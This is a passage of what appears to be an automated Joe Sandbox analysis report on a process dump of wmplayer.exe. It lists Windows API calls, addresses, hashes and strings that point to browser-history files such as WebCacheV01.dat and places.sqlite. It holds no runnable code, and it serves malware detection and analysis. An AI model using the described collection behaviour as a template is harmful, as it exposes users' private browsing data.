                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                            • API String ID: 3354267031-2114579845
                                                                                            APIs
                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            APIs
                                                                                            Strings
                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                            • API String ID: 2221118986-1725073988
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
• memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
Strings
• duplicate column name: %s, xrefs: 004307FE
• too many columns on %s, xrefs: 00430763
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID:
• String ID: duplicate column name: %s$too many columns on %s
• API String ID: 0-1445880494
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
Strings
• failed memory resize %u to %u bytes, xrefs: 00415358
Similarity
• API ID: realloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 471065373-2134078882
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
                                                                                            APIs
                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Similarity
                                                                                            • API ID: File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 3154509469-0
                                                                                            APIs
                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4232544981-0
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            APIs
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                            Similarity
                                                                                            • API ID: AddressProc$FileModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 3859505661-0
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            APIs
                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                            Similarity
                                                                                            • API ID: EnumNamesResource
                                                                                            • String ID:
                                                                                            • API String ID: 3334572018-0
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3655998216-0
                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                            • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                            • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                            • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00445426
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1828521557-0
